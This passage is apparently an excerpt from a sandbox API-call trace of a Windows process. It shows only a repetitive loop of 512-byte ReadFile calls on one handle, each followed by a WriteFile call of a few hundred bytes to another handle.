| out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.758] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.758] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.759] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.760] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.760] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x332, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.761] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.761] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x379, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.762] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.763] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.763] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.764] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.765] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.766] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.766] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.767] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.767] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.768] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.769] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.770] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.771] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.771] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.772] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.773] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.773] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.774] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.775] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.776] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.776] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.777] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.780] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.781] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.782] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.783] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.783] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.784] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.786] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.787] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.787] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.788] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.796] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.797] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.798] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.799] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.799] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.800] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.801] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.801] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.802] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.803] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.804] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.804] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 